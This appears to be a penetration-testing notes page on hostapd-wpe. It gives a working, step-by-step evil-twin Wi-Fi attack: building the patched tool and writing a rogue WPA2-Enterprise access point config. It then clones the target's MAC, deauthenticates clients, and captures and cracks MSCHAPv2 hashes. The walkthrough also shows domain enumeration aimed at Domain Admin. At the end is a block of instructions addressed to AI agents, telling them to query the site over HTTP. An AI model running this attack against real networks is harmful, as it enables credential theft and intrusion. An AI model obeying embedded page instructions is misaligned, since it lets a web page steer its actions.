# HOSTAPD-WPE

[**hostapd-wpe**](https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/hostapd-wpe)

```
apt-get install libssl-dev libnl-genl-3-dev libnl-3-dev pkg-config libsqlite3-dev build-essential wget --no-install-recommends
```

Download the files:

```
wget https://raw.githubusercontent.com/aircrack-ng/aircrack-ng/master/patches/wpe/hostapd-wpe/hostapd-2.10-wpe.patch
wget https://w1.fi/releases/hostapd-2.10.tar.gz
tar -zxf hostapd-2.10.tar.gz
cd hostapd-2.10
patch -p1 < ../hostapd-2.10-wpe.patch
cd hostapd
```

```
make
make install
make wpe
```

**Creating certs**

```
cd /etc/hostapd-wpe/certs
./bootstrap
make install
```

vim wpeattackap.conf

```
└─$ cat wpe_custom.conf 
# ------------------------------
# common hostapd configuration
# ------------------------------
interface=wlan0mon
ssid=XX-AP  #name of the app (even it is hidden)
channel=4
hw_mode=g

# --------------------
# WPA configuration
# --------------------
wpa=2                                       # use WPA2 version
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP

# --------------------------
# EAP server configuration
# --------------------------
ieee8021x=1                                 # requires 802.1x authentication server
eapol_key_index_workaround=0                # EAPOL key index fix for WinXP supplicant (disabled here)
eap_server=1                                # enable integrated EAP server instead of RADIUS
#eap_user_file=fakenet.eap_user              # filename containing information of users

# -------------------------------------------------
# certificate configuration for EAP-TLS/PEAP/TTLS
# -------------------------------------------------
#ca_cert=/root/certs/ca.pem
#server_cert=/root/certs/server.pem 
#private_key=/root/certs/server.key          # private key for the server certificate
#private_key_passwd=                         # password used to encrypt the private key (empty here)
#dh_file=/root/certs/dhparam.pem             # file path to DH/DSA parameters file (in PEM format)

eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/dh


# -----------------------------
# mana specific configuration
# -----------------------------
#mana_wpe=1                                  # enable WPE mode to intercept various EAP credentials
#mana_eapsuccess=1                           # return EAP success to the clients, and have them connect

```

Use the same MAC of target APP

```
macchanger --mac xx:Xx:xx:xx interface
```

```
sudo ./hostapd-wpe ~/wirelesspentestlabs/wpeattackap.conf
```

<pre><code><strong>sudo airodump-ng --channel 4 wlp0s20f3 -w temp --essid-regex XX-AP
</strong></code></pre>

Deauth (with MAC clone, deauth is not necessary if signal is strong \m/)

```
sudo aireplay-ng --deauth 50 -a 6c:8d:77:27:a1:25  --ignore-negative-one wlp0s20f3
```

**GOTCHA!**

```
wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.1X: Identity received from STA: 'XXXX\xxx.xxx'


mschapv2: Fri Mar 15 03:36:34 2024
         username:      xxx\xxx.xx
         challenge:     57:f6xx:c6:33:4b
         response:      9e:2a:87xxxxx:ef:b2:58:4a:3f:b3:fd:1d:03:08
         jtr NETNTLM:           xx\xx.leao:$NETNTLM$57f6xc6334b$9exxxxxxx84a3fb3fd1d0308
         hashcat NETNTLM:       xx\xx.leao::::9e2a8702xxf6bbxxxx3fb3fd1d0308:57f6xxxc6334b
wlan0mon: STA 5c:fb:3a:2f:00:2f IEEE 802.11: authenticated
wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.11: authenticated
wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.11: associated (aid 3)
```

Cracking it!

```
john-the-ripper hash 
```

<figure><img src="/files/b598dkmf2PEY4GRZ890u" alt=""><figcaption></figcaption></figure>

## Getting Domain Admin From WiFI Scratch Approach \o/

As the SSID is hidden, the "hidden" network can be created.

<figure><img src="/files/usweioeDi68CF0O4luOA" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/bGiwbJoA6tl90Q5LOyHc" alt=""><figcaption></figcaption></figure>

```
cat /etc/resolv.conf
nameserver 127.0.0.53
options edns0 trust-ad
search xxx.local

ptavares@kali:~$ host xxxx.local
xxx.local has address 10.1.11.36
xxxx.local has address 10.0.4.1
xxxx.local has address 10.1.0.1

```

<figure><img src="/files/esBTdCLyPT8XvJ8LZQhS" alt=""><figcaption></figcaption></figure>

```
Bloodhound, or other tools can be executed now \,)
crackmapexec smb DC01 -u -p --users
```

<figure><img src="/files/NLVaThdV7nM5h3nq7qOE" alt=""><figcaption></figcaption></figure>

## Reference

{% embed url="<https://www.netprojnetworks.com/wireless-pentest-lab-part-3/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gitbook.seguranca-informatica.pt/pwnage/wifi/hostapd-wpe.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.